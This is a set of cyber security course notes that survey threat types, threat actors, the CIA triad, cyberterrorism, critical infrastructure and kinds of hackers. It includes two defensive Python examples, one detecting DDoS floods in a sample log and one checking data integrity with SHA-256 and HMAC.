Cyber_Security Notes

The document provides an overview of cyber security, defining it as the protection of internet-connected systems from malicious attacks and categorizing it into various sub-domains such as network security, application security, and cloud security. It discusses the importance of cyber security in safeguarding sensitive data, preventing cyber attacks, and maintaining business continuity, while also addressing the challenges posed by evolving threats. Additionally, it highlights common cyber threats like malware, phishing, and insider threats, and emphasizes the significance of a robust cyber security strategy in today's digital landscape.

Subject: Cyber Security (Theory)

Code: PEC- CS702E and PEC- IT702F

Introduction to Cyber Security

What is Cyber Security?

Cyber Security is a process that is designed to protect networks and devices
from external threats. The technique of protecting internet-connected systems
such as computers, servers, mobile devices, electronic systems, networks, and
data from malicious attacks is known as cyber security. We can divide cyber
security into two parts: one is cyber, and the other is security. Cyber refers
to the technology that includes systems, networks, programs, and data, and
security is concerned with the protection of systems, networks, applications,
and information. In some cases, it is also called electronic information
security or information technology security.

Some other definitions of cyber security are:

"Cyber Security is the body of technologies, processes, and practices
designed to protect networks, devices, programs, and data from attack,
theft, damage, modification or unauthorized access."

"Cyber Security is the set of principles and practices designed to protect
our computing resources and online information against threats."

Types of Cyber Security

Every organization's assets are the combination of a variety of different
systems. A strong cybersecurity posture for these systems requires
coordinated efforts across all of them. Therefore, we can categorize
cybersecurity into the following sub-domains:

o Network Security: It involves implementing the hardware and software
to secure a computer network from unauthorized access, intruders,
attacks, disruption, and misuse. This security helps an organization to
protect its assets against external and internal threats.
o Application Security: It involves protecting the software and devices
from unwanted threats. This protection can be done by constantly
updating the apps to ensure they are secure from attacks. Successful
security begins in the design stage, writing source code, validation,
threat modeling, etc., before a program or device is deployed.
o Information or Data Security: It involves implementing a strong data
storage mechanism to maintain the integrity and privacy of data, both in
storage and in transit.
o Identity management: It deals with the procedure for determining the
level of access that each individual has within an organization.
o Operational Security: It involves processing and making decisions on
handling and securing data assets.
o Mobile Security: It involves securing the organizational and personal
data stored on mobile devices such as cell phones, computers, tablets,
and other similar devices against various malicious threats. These threats
are unauthorized access, device loss or theft, malware, etc.
o Cloud Security: It involves protecting the information stored in the
digital environment or cloud architectures of the organization. It uses
the controls of cloud service providers such as AWS, Azure, Google, etc., to
ensure security against multiple threats.
o Disaster Recovery and Business Continuity Planning: It deals with the
processes, monitoring, alerts, and plans to how an organization
responds when any malicious activity is causing the loss of operations or
data. Its policies dictate resuming the lost operations after any disaster
happens to the same operating capacity as before the event.
o User Education: It deals with the people in the organization rather than
its systems. Because staff are a frequent entry point for attacks, it
covers the training and awareness programs that teach users to recognize
suspicious emails and websites and to follow the organization's security
procedures.

Importance and challenges in Cyber Security

Importance of Cyber Security

Today we live in a digital era where all aspects of our lives depend on the
network, computers and other electronic devices, and software applications.
All critical infrastructure such as the banking system, healthcare, financial
institutions, governments, and manufacturing industries use devices
connected to the Internet as a core part of their operations. Some of their
information, such as intellectual property, financial data, and personal data,
is sensitive, and unauthorized access to it or exposure of it could have
negative consequences. This information gives intruders and threat actors a
motive to infiltrate these organizations for financial gain, extortion,
political or social motives, or just vandalism.

Cyber-attacks are now an international concern: a hacked system and other
security attacks could endanger the global economy. Therefore, it is essential
to have an excellent cyber security strategy to protect sensitive information
from high-profile security breaches. Furthermore, as the volume of cyber-
attacks grows, companies and organizations, especially those that deal with
information related to national security, health, or financial records, need to
use strong cyber security measures and processes to protect their sensitive
business and personal information.

Protecting Sensitive Data:

With the increase in digitalization, data is becoming more and more valuable.
Cybersecurity helps protect sensitive data such as personal information,
financial data, and intellectual property from unauthorized access and theft.

Prevention of Cyber Attacks:

Cyber attacks, such as Malware infections, Ransomware, Phishing,
and Distributed Denial of Service (DDoS) attacks, can cause significant
disruptions to businesses and individuals. Effective cybersecurity measures
help prevent these attacks, reducing the risk of data breaches, financial losses,
and operational disruptions.

Safeguarding Critical Infrastructure:


Critical infrastructure, including power grids, transportation systems,
healthcare systems, and communication networks, heavily relies on
interconnected computer systems. Protecting these systems from cyber
threats is crucial to ensure the smooth functioning of essential services and
prevent potential disruptions that could impact public safety and national
security.

Maintaining Business Continuity:

Cyber attacks can cause significant disruption to businesses, resulting in lost
revenue, damage to reputation, and in some cases, even shutting down the
business. Cybersecurity helps ensure business continuity by preventing or
minimizing the impact of cyber attacks.

Compliance with Regulations:

Many industries are subject to strict regulations that require organizations to
protect sensitive data. Failure to comply with these regulations can result in
significant fines and legal action. Cybersecurity helps ensure compliance with
regulations such as HIPAA, GDPR, and PCI DSS.

Protecting National Security:

Cyber attacks can be used to compromise national security by targeting
critical infrastructure, government systems, and military installations.
Cybersecurity is critical for protecting national security and preventing cyber
warfare.

Preserving Privacy:

In an era where personal information is increasingly collected, stored, and
shared digitally, cybersecurity is crucial for preserving privacy. Protecting
personal data from unauthorized access, surveillance, and misuse helps
maintain individuals’ privacy rights and fosters trust in digital services.

Challenges of Cyber security:

Constantly Evolving Threat Landscape:

Cyber threats are constantly evolving, and attackers are becoming increasingly
sophisticated. This makes it challenging for cybersecurity professionals to keep

Cyberspace

Cyberspace refers to the virtual computer world, and more specifically, an
electronic medium that is used to facilitate online communication. Cyberspace
typically involves a large computer network made up of many worldwide
computer sub-networks that employ TCP/IP protocol to aid in communication
and data exchange activities.

Cyberspace is a concept describing a widespread interconnected digital
technology. The term entered popular culture from science fiction and the arts
but is now used by technology strategists, security professionals,
governments, military and industry leaders and entrepreneurs to describe the
domain of the global technology environment, commonly defined as standing
for the global network of interdependent information technology
infrastructures, telecommunications networks and computer processing
systems.

Others consider cyberspace to be just a notional environment in which
communication over computer networks occurs. The word became popular in
the 1990s when the use of the Internet, networking, and digital
communication were all growing dramatically; the term cyberspace was able
to represent the many new ideas and phenomena that were emerging.

Cyberspace’s core feature is an interactive and virtual environment for a broad
range of participants. In the common IT lexicon, any system that has a
significant user base or even a well-designed interface can be thought to be
“cyberspace.”

Cyber Threats
A cybersecurity threat is the threat of a malicious attack by an individual or
organization attempting to gain access to a computer network, corrupt data,
or steal confidential information. An information security threat is an attack
that pertains directly to the IT stakeholders and your organization’s computer
networks.

No organization is immune from cyber attacks and data breaches. Some
attacks can even destroy computer systems.

Cyber threats also refer to the possibility of a successful cyber attack that aims
to gain unauthorized access, damage, disrupt, or steal an information
technology asset, computer network, intellectual property, or any other form
of sensitive data. Cyber threats can come from within an organization by
trusted users or from remote locations by unknown parties.

What Are the Top Information Security Threats?


To answer this question, one first needs to understand the difference between
infosec and cybersecurity, as well as the types of threats you’ll face. This
includes both the information security threats that exist today, as well as the
new and emerging threats sure to plague your enterprise tomorrow.

Malware

The most common cyberattack is malicious software, more commonly known
as malware. Malware includes spyware, ransomware, backdoors, trojans,
viruses, and worms.

• Spyware allows attackers to obtain information about your computer
activities by transmitting data covertly from your hard drive.
• Ransomware blocks access to files on a device, rendering any files (and
the systems that rely on them) unavailable. Usually, malicious actors
demand a cash ransom in exchange for a decryption key.
• A backdoor circumvents routine authentication procedures to access a
system. This gives the attacker remote access to resources within an
application, such as databases and file servers, and allows malicious
actors to issue system commands and update malware remotely.
• Trojans are malware or code that acts as a legitimate application or file
to trick you into loading and executing the malware on your device. A
trojan’s goal is to damage or steal your organization’s data or to inflict
some other harm on your network.
• A computer virus is malicious code designed to spread from device to
device. These self-copying threats are usually intended to damage a
machine or steal data.
• Worms are malware that spread copies of themselves from computer to
computer without human interaction. They do not need to attach
themselves to a software program to cause damage.

Malware is usually installed into the system when the user opens a malicious
link or email. Once installed, malware can block access to critical components
of your network, damage your system, and export confidential information to
destinations unknown.
Your organization can prevent malware-based cyber attacks by:

• Using reputable antivirus and anti-malware solutions, email spam filters,
and endpoint security solutions.
• Ensuring that your cybersecurity updates and patches are all up to date.
• Requiring your employees to undergo regular cybersecurity awareness
training to teach them how to avoid suspicious websites and to avoid
engaging with suspicious emails.
• Limiting user access and application privileges.

Phishing and spear-phishing

Phishing is a type of attack that attempts to trick users into giving over
sensitive data such as usernames and passwords, bank account information,
Social Security numbers, and credit card data.

Typically hackers send out phishing emails that seem to come from trusted
senders, such as PayPal, eBay, financial institutions, or friends and co-workers.
The bogus messages try to get users to click on links in the emails, directing
users to fraudulent websites that ask for personal information or install
malware on their devices.

Opening attachments sent via phishing emails can also install malware or
allow hackers to control your devices remotely.

Spear-phishing is a more sophisticated form of phishing attack, where
cybercriminals target only privileged users, such as system administrators or
C-suite executives. The attackers might use details from a person’s social
media accounts to seem even more legitimate to the target.

Other types of phishing can include smishing, vishing, clone phishing, domain
spoofing, URL phishing, watering hole phishing, and evil twin phishing. All can
be costly.

Organizations can do several things to reduce the chances of phishing:

• Implement cybersecurity awareness training for every employee.
• Emphasize the importance of phishing reporting.
• Run random phishing simulations.
• Push HTTPS on your website to create secure, encrypted connections.
• Institute access management policies and procedures.
• Use reliable email and spam filters.
• Require two-factor authentication.
• Use email encryption and email signing certificates.

Man-in-the-middle (MiTM) attacks

Man-in-the-middle attacks occur when malicious actors insert themselves into
the middle of a two-party communication. Once the attacker intercepts the
incoming message, they filter and steal sensitive information and then return
different responses to the original user.

Sometimes malicious actors set up fake Wi-Fi networks or install malware on
users’ computers or networks. Also called eavesdropping attacks, MiTM
attacks aim to access your business or customer data.

Distributed denial-of-service (DDoS)

A DDoS attack aims to take down a company’s website by overwhelming its
servers with requests. It’s analogous to calling a company’s phone number
constantly so that legitimate callers only get a busy signal and never get
through.

In this attack, requests come from hundreds or thousands of IP addresses that
have probably also been compromised and tricked into continuously
requesting a company’s website.

A DDoS attack can overload your servers, slowing them down significantly or
temporarily taking them offline. These shutdowns prevent customers from
accessing your website and completing orders.
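As an added example, not taken from the notes, the following Python script applies the observation above: in a distributed flood the requests arrive from many addresses, so a threshold on any single source misses it. The script buckets constructed access-log lines into fixed time windows and raises a finding either for one source over its limit or for a window whose aggregate exceeds what the site can serve. The log format, the thresholds and the IP addresses (taken from the RFC 5737 documentation ranges) are assumptions made for the demonstration.

```python
from collections import defaultdict


def build_sample_log():
    """Constructed traffic, not a real capture: a quiet window starting at
    t=0 with one client, then a burst at t=100 in which 50 distinct sources
    each send only 3 requests."""
    lines = [f"{i} 192.0.2.10 /index.html" for i in range(5)]
    for host in range(50):
        for k in range(3):
            lines.append(f"{100 + k} 198.51.100.{host + 1} /index.html")
    return lines


def parse_line(line):
    """Assumed log format: '<epoch seconds> <source ip> <path>'."""
    ts, ip, path = line.split()
    return int(ts), ip, path


def analyze_windows(lines, window_seconds=10, per_ip_limit=20, total_limit=100):
    """Bucket requests into fixed windows and return a list of findings.

    A 'noisy_source' finding is raised for each (window, source) above
    per_ip_limit; a 'distributed_flood' finding is raised for each window
    whose total exceeds total_limit. The aggregate rule is what catches a
    DDoS, where no single address looks abusive on its own.
    """
    windows = defaultdict(lambda: defaultdict(int))
    for line in lines:
        ts, ip, _ = parse_line(line)
        windows[ts // window_seconds][ip] += 1

    findings = []
    for w in sorted(windows):
        counts = windows[w]
        start = w * window_seconds
        for ip, n in counts.items():
            if n > per_ip_limit:
                findings.append(("noisy_source", start, ip, n))
        total = sum(counts.values())
        if total > total_limit:
            findings.append(("distributed_flood", start, len(counts), total))
    return findings


if __name__ == "__main__":
    for finding in analyze_windows(build_sample_log()):
        print(finding)
```

On the constructed log the quiet window produces nothing and the burst window produces a single distributed_flood finding (150 requests from 50 sources), even though every source stays well under the per-address limit; in production the same two-rule structure is usually implemented at the load balancer or WAF rather than by re-reading logs.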

Structured Query Language (SQL) injection

SQL injection attacks occur when cybercriminals attempt to access databases
by submitting malicious SQL through application input that the application
passes into its database queries. Once successful, the malicious actor can
view, change, or delete data stored in the SQL database.

Domain Name System (DNS) attack

A DNS attack is a cyberattack where cybercriminals exploit vulnerabilities in
the DNS. The attackers leverage the DNS vulnerabilities to divert site visitors
to malicious pages (DNS hijacking) and exfiltrate data from compromised
systems (DNS tunneling).

Insider threats

Insider threats occur when an individual within an organization either
mistakenly or purposefully allows access to crucial secure networks. This can
happen when an employee doesn’t follow proper information security
protocols and clicks on a phishing link or installs malware. They may also
accidentally email customer data to an unsecure third party or grant
unauthorized access to an ill-intentioned actor.

Drive-By download attack

A drive-by download attack occurs when an individual visits a website and a
piece of code is installed without their permission. This is a common
cybercrime that allows the criminal to install a Trojan or malware, or steal
information without the individual’s knowledge.

What Are Common Sources of Cyber Threats?


Understanding threat actors and their tactics, techniques, and procedures
(“TTPs”) is essential to respond effectively to any cyberattack. Attackers can
include:

• Nation-states. Cyber attacks by a nation can disrupt communications,
military activities, and everyday life.
• Organized crime. Criminal groups aim to infiltrate systems or networks
for financial gain. These groups use phishing, spam, spyware, and
malware to conduct identity theft, online fraud, and system extortion.
• Hackers. Hackers employ various cyber techniques to breach defenses
and exploit vulnerabilities in a computer system or network. They are
usually motivated by personal gain, revenge, stalking, financial gain, or
political activism. Hackers may develop new threats for the hacker
community’s thrill of challenge or bragging rights.
• Terrorist groups. Terrorists conduct cyberattacks to destroy, infiltrate, or
exploit critical infrastructure to threaten national security, compromise
military equipment, disrupt the economy, and cause mass casualties.
• Insiders with malicious intent. Insiders can be workers, contractors,
third-party suppliers, or other business partners who have lawful access
to company resources but abuse it to steal or destroy data for their own
or others’ financial or personal advantage.

Cyberwarfare
Cyberwarfare is the use of cyber attacks against an enemy state, causing
comparable harm to actual warfare and/or disrupting vital computer systems.
Some intended outcomes could be espionage, sabotage, propaganda,
manipulation or economic warfare.
There is significant debate among experts regarding the definition of
cyberwarfare, and even if such a thing exists. One view is that the term is a
misnomer since no cyber attacks to date could be described as a war. An
alternative view is that it is a suitable label for cyber attacks which cause
physical damage to people and objects in the real world.
Many countries including the United States, United
Kingdom, Russia, China, Israel, Iran, and North Korea have active cyber
capabilities for offensive and defensive operations. As states explore the use of
cyber operations and combine capabilities, the likelihood of physical
confrontation and violence playing out as a result of, or part of, a cyber
operation is increased. However, meeting the scale and protracted nature of
war is unlikely, thus ambiguity remains.
The first instance of kinetic military action used in response to a cyber-attack
resulting in the loss of human life was observed on 5 May 2019, when
the Israel Defense Forces targeted and destroyed a building associated with
an ongoing cyber-attack.

CIA Triad
What is the CIA Triad?
The three letters in "CIA triad" stand for Confidentiality, Integrity, and
Availability. The CIA triad is a common model that forms the basis for the
development of security systems. They are used for finding vulnerabilities and
methods for creating solutions.
The confidentiality, integrity, and availability of information are crucial to the
operation of a business, and the CIA triad segments these three ideas into
separate focal points. This differentiation is helpful because it helps guide
security teams as they pinpoint the different ways in which they can address
each concern.
Ideally, when all three standards have been met, the security profile of the
organization is stronger and better equipped to handle threat incidents.

Confidentiality
Confidentiality involves the efforts of an organization to make sure data is
kept secret or private. To accomplish this, access to information must be
controlled to prevent the unauthorized sharing of data, whether intentional
or accidental. A key component of maintaining confidentiality is making sure
that people without proper authorization are prevented from accessing assets
important to your business. Conversely, an effective system also ensures that
those who need to have access have the necessary privileges.
For example, those who work with an organization’s finances should be able
to access the spreadsheets, bank accounts, and other information related to
the flow of money. However, the vast majority of other employees, and
perhaps even certain executives, may not be granted access. To ensure these
policies are followed, stringent restrictions have to be in place to limit who can
see what.
There are several ways confidentiality can be compromised. This may involve
direct attacks aimed at gaining access to systems the attacker does not have
the rights to see. It can also involve an attacker making a direct attempt to
infiltrate an application or database so they can take data or alter it.
These direct attacks may use techniques such as man-in-the-middle (MITM)
attacks, where an attacker positions themselves in the stream of information
to intercept data and then either steal or alter it. Some attackers engage in
other types of network spying to gain access to credentials. In some cases, the
attacker will try to gain more system privileges to obtain the next level of
clearance.
However, not all violations of confidentiality are intentional. Human error or
insufficient security controls may be to blame as well. For example, someone
may fail to protect their password, either to a workstation or to log in to a
restricted area. Users may share their credentials with someone else, or they
may allow someone to see their login while they enter it. In other situations, a
user may not properly encrypt a communication, allowing an attacker to
intercept their information. Also, a thief may steal hardware, whether an entire
computer or a device used in the login process, and use it to access
confidential information.
To fight against confidentiality breaches, you can classify and label restricted
data, enable access control policies, encrypt data, and use multi-factor
authentication (MFA) systems. It is also advisable to ensure that all in the
organization have the training and knowledge they need to recognize the
dangers and avoid them.

Integrity
Integrity involves making sure your data is trustworthy and free from
tampering. The integrity of your data is maintained only if the data is
authentic, accurate, and reliable.
For example, if your company provides information about senior managers on
your website, this information needs to have integrity. If it is inaccurate, those
visiting the website for information may feel your organization is not
trustworthy. Someone with a vested interest in damaging the reputation of
your organization may try to hack your website and alter the descriptions,
photographs, or titles of the executives to hurt their reputation or that of the
company as a whole.
Compromising integrity is often done intentionally. An attacker may bypass an
intrusion detection system (IDS), change file configurations to allow
unauthorized access, or alter the logs kept by the system to hide the attack.
Integrity may also be violated by accident. Someone may accidentally enter
the wrong code or make another kind of careless mistake. Also, if the
company’s security policies, protections, and procedures are inadequate,
integrity can be violated without any one person in the organization
accountable for the blame.
To protect the integrity of your data, you can use hashing, encryption, digital
certificates, or digital signatures. For websites, you can employ trustworthy
certificate authorities (CAs) that verify the authenticity of your website so
visitors know they are getting the site they intended to visit.
A method for verifying integrity is non-repudiation, which refers to when
something cannot be repudiated or denied. For example, if employees in your
company use digital signatures when sending emails, the fact that the email
came from them cannot be denied. Also, the recipient cannot deny that they
received the email from the sender.
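The section above names hashing and digital signatures as integrity controls. The Python example below, added here and not part of the notes, shows the two checks a practitioner most often writes: a plain SHA-256 digest that detects modification of a record, and an HMAC tag that cannot be recomputed without the key. The sample record (standing in for the executive bios in the text) and the key are constructed. One caveat the example makes visible: an HMAC proves integrity to anyone holding the key but does not give non-repudiation, because every key holder could have produced the tag; the non-repudiation property the text describes requires an asymmetric digital signature, where only the signer holds the private key.

```python
import hashlib
import hmac

# Constructed sample content standing in for the executive information on the
# company website in the text; not real data.
SAMPLE_RECORD = b"CEO: A. Example; CFO: B. Example; CTO: C. Example"
# Constructed demonstration key; a real deployment loads it from a secret store.
DEMO_KEY = b"constructed-demo-key-do-not-reuse"


def sha256_hex(data: bytes) -> str:
    """Unkeyed digest. It detects any change to the data, but anyone who can
    edit the data can also recompute it, so it only protects integrity when the
    digest is stored somewhere the attacker cannot reach."""
    return hashlib.sha256(data).hexdigest()


def digest_matches(data: bytes, expected_hex: str) -> bool:
    # compare_digest runs in constant time, avoiding a timing side channel.
    return hmac.compare_digest(sha256_hex(data), expected_hex)


def make_tag(key: bytes, data: bytes) -> str:
    """Keyed digest (HMAC-SHA256). Producing a valid tag requires the key, so
    an attacker who alters the data cannot also forge a matching tag."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def tag_matches(key: bytes, data: bytes, tag: str) -> bool:
    return hmac.compare_digest(make_tag(key, data), tag)


def check_record(record: bytes, published_digest: str,
                 key: bytes, published_tag: str) -> dict:
    """Run both checks on a record and report each result separately."""
    return {
        "digest_ok": digest_matches(record, published_digest),
        "tag_ok": tag_matches(key, record, published_tag),
    }


if __name__ == "__main__":
    digest = sha256_hex(SAMPLE_RECORD)
    tag = make_tag(DEMO_KEY, SAMPLE_RECORD)
    print("original  :", check_record(SAMPLE_RECORD, digest, DEMO_KEY, tag))

    tampered = SAMPLE_RECORD.replace(b"CFO: B. Example", b"CFO: X. Intruder")
    print("tampered  :", check_record(tampered, digest, DEMO_KEY, tag))

    # An attacker who can edit the record can recompute the unkeyed digest to
    # match the tampered content, but cannot recompute the HMAC without the key.
    print("re-hashed :", check_record(tampered, sha256_hex(tampered), DEMO_KEY, tag))
```

The third case is the one that matters in practice: a hash stored next to the data it protects is only as trustworthy as the storage, whereas the keyed tag fails even after the attacker has re-hashed the tampered record. Both checks use hmac.compare_digest rather than == so that the comparison does not leak, through its timing, how many leading characters of a guessed value were correct.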

Availability
Even if data is kept confidential and its integrity maintained, it is often useless
unless it is available to those in the organization and the customers they serve.
This means that systems, networks, and applications must be functioning as
they should and when they should. Also, individuals with access to specific
information must be able to consume it when they need to, and getting to the
data should not take an inordinate amount of time.
If, for example, there is a power outage and there is no disaster recovery
system in place to help users regain access to critical systems, availability will
be compromised. Also, a natural disaster like a flood or even a severe
snowstorm may prevent users from getting to the office, which can interrupt
the availability of their workstations and other devices that provide business-
critical information or applications. Availability can also be compromised
through deliberate acts of sabotage, such as the use of denial-of-service (DoS)
attacks or ransomware.
To ensure availability, organizations can use redundant networks, servers, and
applications. These can be programmed to become available when the
primary system has been disrupted or broken. You can also enhance
availability by staying on top of upgrades to software packages and security
systems. In this way, you make it less likely for an application to malfunction or
for a relatively new threat to infiltrate your system. Backups and full disaster
recovery plans also help a company regain availability soon after a negative
event.

Why Should You Use the CIA Triad?


The CIA triad provides a simple yet comprehensive high-level checklist for the
evaluation of your security procedures and tools. An effective system satisfies
all three components: confidentiality, integrity, and availability. An information
security system that is lacking in one of the three aspects of the CIA triad is
insufficient.
The CIA security triad is also valuable in assessing what went wrong, and
what worked, after a negative incident. For example, perhaps availability was
compromised after a malware attack such as ransomware, but the systems in
place were still able to maintain the confidentiality of important information.
This data can be used to address weak points and replicate successful policies
and implementations.

When Should You Use the CIA Triad?
You should use the CIA triad in the majority of security situations, particularly
because each component is critical. However, it is particularly helpful when
developing systems around data classification and managing permissions and
access privileges. You should also stringently employ the CIA triad when
addressing the cyber vulnerabilities of your organization. It can be a powerful
tool in disrupting the Cyber Kill Chain, which refers to the process of targeting
and executing a cyberattack. The CIA security triad can help you home in on
what attackers may be after and then implement policies and tools to
adequately protect those assets.
In addition, the CIA triad can be used when training employees regarding
cybersecurity. You can use hypothetical scenarios or real-life case studies to
help employees think in terms of the maintenance of confidentiality, integrity,
and availability of information and systems.

Cyber Terrorism
Cyberterrorism is the use of the Internet to conduct violent acts that result in,
or threaten, the loss of life or significant bodily harm, in order to achieve
political or ideological gains through threat or intimidation. Acts of deliberate,
large-scale disruption of computer networks, especially of personal computers
attached to the Internet by means of tools such as computer viruses,
computer worms, phishing, malicious software, hardware methods,
programming scripts can all be forms of internet terrorism. Cyberterrorism is a
controversial term. Some authors opt for a very narrow
definition, relating to deployment by known terrorist organizations of
disruption attacks against information systems for the primary purpose of
creating alarm, panic, or physical disruption. Other authors prefer a broader
definition, which includes cybercrime. Participating in a cyberattack affects the
terror threat perception, even if it isn't done with a violent approach. By some
definitions, it might be difficult to distinguish which instances of online
activities are cyberterrorism or cybercrime.
Cyberterrorism can be also defined as the intentional use of computers,
networks, and public internet to cause destruction and harm for personal
objectives. Experienced cyberterrorists, who are very skilled in terms of
hacking can cause massive damage to government systems and might leave a
country in fear of further attacks. The objectives of such terrorists may be
political or ideological since this can be considered a form of terror.
There is much concern from government and media sources about potential
damage that could be caused by cyberterrorism, and this has prompted
efforts by government agencies such as the Federal Bureau of Investigation
(FBI) and the Central Intelligence Agency (CIA) to put an end to cyber attacks
and cyberterrorism.
There have been several major and minor instances of cyberterrorism. Al-
Qaeda utilized the internet to communicate with supporters and even to
recruit new members. Estonia, a Baltic country which is constantly evolving in
terms of technology, became a battleground for cyberterrorism in April 2007
after disputes regarding the relocation of a WWII Soviet statue located in
Estonia's capital Tallinn.

Cyber Security of Critical Infrastructure

What is critical infrastructure cybersecurity?


Critical infrastructure cybersecurity refers to the programs, protocols, and
technology used to protect the critical infrastructure of nation states. Cyber
criminals frequently target national infrastructure such as utilities,
transportation systems, financial sectors, food and agriculture systems, energy
companies, and other operations that provide essential services to
governments and their citizens.
The maintenance and reliability of cybersecurity systems and critical
infrastructure are essential to the security of a nation. Advances in
cyber-physical and networked information systems, commonly grouped under the
Internet of Things (IoT), have brought unparalleled opportunities for improved
monitoring, operation and reliability to personal, public, private and
commercial systems alike. The same connectivity also widens the attack surface.
SMRP (the Society for Maintenance and Reliability Professionals) holds that a
sound cyber-defence strategy starts with research into the threat at the first
line of defence and into the interconnections between companies, vendors,
contractors and subcontractors, since those links are the route by which IoT
devices expose critical infrastructure. SMRP's policy position is that the
maintenance and reliability of cybersecurity systems and critical infrastructure
are essential to protecting the nation's economy and infrastructure.
SMRP is a member of the National Network led by the Department of Homeland
Security's (DHS) Stop.Think.Connect.™ Campaign, a national public awareness
campaign aimed at increasing the understanding of cyber threats and empowering
the American public to be safer and more secure online.

Cyber Attacks in Organizations: Challenges and Implications

Introduction:

In today's digital age, organizations face a constant threat from cyber attacks
that can have severe consequences for their operations, reputation, and
financial stability. This section explores the challenges organizations
encounter in dealing with cyber attacks and highlights the implications for
their security posture.

I. Evolving Threat Landscape:

The rapid advancement of technology has led to a parallel rise in sophisticated
cyber threats. Hackers and cybercriminals employ various techniques such as
malware, phishing, ransomware, and social engineering to exploit
vulnerabilities in organizational systems. The ever-evolving nature of these
threats poses a significant challenge for organizations to keep up with the
latest security measures.

II. Insider Threats:

One of the most challenging aspects of cyber attacks for organizations is the
presence of insider threats. Employees or former employees with malicious
intent can compromise sensitive data, sabotage systems, or provide
unauthorized access to cybercriminals. Mitigating insider threats requires a
delicate balance between trust and security, as organizations must implement
robust access controls, monitoring systems, and employee awareness
programs.

III. Data Breaches and Privacy Concerns:

Data breaches have become alarmingly common, leading to the exposure of
sensitive information and violating user privacy. Organizations must adhere to
strict data protection regulations, such as the General Data Protection
Regulation (GDPR) in the European Union, to safeguard customer data. The
financial and reputational damage resulting from data breaches can be
significant, necessitating proactive measures to prevent and respond to such
incidents.

IV. Resource Constraints:

Many organizations, particularly small and medium-sized enterprises, face
resource constraints when it comes to cybersecurity. Limited budgets and lack
of skilled personnel make it challenging to implement robust security
measures and maintain an effective security posture. Cybersecurity awareness
training, regular system updates, and investing in reliable security solutions
are crucial but often overlooked due to resource limitations.

V. Rapid Technological Advancements:

The rapid adoption of emerging technologies such as cloud computing, the
Internet of Things (IoT), and artificial intelligence (AI) brings new security
challenges for organizations. Integrating these technologies into existing
infrastructures without compromising security requires specialized knowledge
and expertise. Failure to address these challenges effectively can expose
organizations to vulnerabilities and potential cyber attacks.

VI. Incident Response and Recovery:

Cyber attacks can be disruptive, causing operational downtime and financial
losses. Organizations need to have well-defined incident response plans in
place to minimize the impact of attacks. Incident response teams should be
trained and equipped to detect, contain, and recover from security incidents
promptly. Regular testing and updating of incident response plans are critical
to ensure their effectiveness.

VII. Third-Party Risks:

Many organizations rely on third-party vendors and partners for various
services and support. However, these relationships can introduce additional
risks. Cyber attacks on third-party vendors can compromise organizational
systems and data. Organizations must conduct due diligence and establish
strong security protocols when engaging with third parties to mitigate these
risks.

VIII. Regulatory Compliance:

Organizations are subject to an increasing number of cybersecurity regulations
and compliance standards. Failure to comply with these requirements can
result in legal repercussions and reputational damage. Navigating the complex
landscape of regulatory compliance can be challenging, particularly for
multinational organizations operating in different jurisdictions with varying
data protection laws.

Conclusion:

Cyber attacks pose significant challenges for organizations across all sectors.
To mitigate these threats, organizations must stay vigilant, prioritize
cybersecurity measures, and invest in robust infrastructure, personnel training,
and incident response capabilities. Proactive risk management, collaboration
with security experts, and adherence to regulatory frameworks are essential to
safeguard sensitive data and maintain the trust of customers and stakeholders
in today's digital landscape.
Hackers and Cyber Crimes

Introduction
Computers and the Internet have changed the working environment of the world beyond
recognition. As computers took over a major part of our lives, our data moved from paper
records and ledgers onto computers. Although this shift has reduced the physical burden on
workers, it has also increased the opportunities for data theft. The people who steal data or
damage systems are knowledgeable people with the wrong intentions, commonly called hackers.
There are different types of hackers. Let us look at how many types there are and at the kinds
of attacks and techniques they use.

Who is a Hacker?

A hacker is, in the original sense, a person who is skilled in information technology and uses
that technical knowledge to overcome an obstacle or achieve a goal within a computerized
system. In recent times, however, the term is usually associated with a security hacker:
someone who looks for ways to acquire and exploit sensitive personal, financial and
organizational information that is otherwise not accessible to them. Security professionals
also hack, legally and with authorization, in order to test and improve defences.

How does Hacking Work?

Hackers are highly skilled at breaching security to gain unauthorized access to phones, tablets,
computers, IoT devices, networks, or the entire network of an organization. They are generally
very proficient at finding and exploiting weaknesses in network security. These weaknesses can
be technical or social in nature.

• Technical weaknesses: Hackers exploit software vulnerabilities or weak security practices
to gain unauthorized access, or to plant malware that can cripple an entire system.
• Social weaknesses: Social engineering is used to convince people with privileged access to
click on malicious links, open infected files, or reveal personal information. This gives the
attacker a way into infrastructure that is otherwise well hardened.

Types Of Hackers

1. White Hat / Ethical Hackers
2. Black Hat Hackers
3. Gray Hat Hackers
4. Script Kiddies
5. Green Hat Hackers
6. Blue Hat Hackers
7. Red Hat Hackers
8. State/Nation Sponsored Hackers
9. Hacktivist
10. Malicious insider or Whistleblower

1) White Hat Hackers

White hat hackers are professionals with expertise in cybersecurity who are authorized, and
often certified, to hack systems. They work for governments or organizations and break into
systems through the loopholes in the organization's security, with permission, in order to test
the organization's level of security. By doing so they identify the weak points and help fix them
before external attackers can use them. White hat hackers work within the rules and regulations
set by the government and by the terms of their engagement. They are also known as ethical
hackers.

Motives & Aims: White hat hackers are motivated by a desire to help businesses and an appetite
for detecting gaps in network security. They aim to protect and assist companies in the ongoing
battle against cyber threats and rising cybercrime. They help enterprises create defences, detect
vulnerabilities, and fix them before criminals find them.

2) Black Hat Hackers

Black hat hackers are also knowledgeable computer experts, but with the wrong intentions. They
attack systems to which they have no authorized access. Once inside, they may steal data or
destroy the system. The techniques a black hat uses depend on the individual's skill and
knowledge; it is the malicious intent that makes the hacker a criminal. Neither that intent nor
the full extent of a breach can usually be gauged while the attack is in progress.

Motives & Aims: To break into organizations' networks and steal banking data, funds or
sensitive information. Normally they use what they steal for their own profit, sell it on the
black market, or use it to harass or extort the target company.

3) Gray Hat Hackers

The intention behind the hacking is what is considered when categorizing a hacker, and the gray
hat hacker falls between the black and white hats. Gray hats are not certified and do not have
authorization, but they usually do not act with malicious intent either: they break into systems
to find flaws, and may then report them to the owner, publish them, or ask for a fee. Because
the access is unauthorized, their activity is still illegal even when no harm is done.

Motives & Aims: They do not set out to rob people, nor to help any particular organization.
Rather, they enjoy experimenting with systems to find loopholes, crack defences, and generally
have a fun hacking experience.

4) Script Kiddies
It is often said that half knowledge is dangerous. Script kiddies are amateurs in the field of
hacking. They try to attack systems, networks, or websites using scripts and tools written by
other hackers, without understanding how those tools work. Their aim is usually to get the
attention of their peers. Script kiddies are often young and do not have a complete
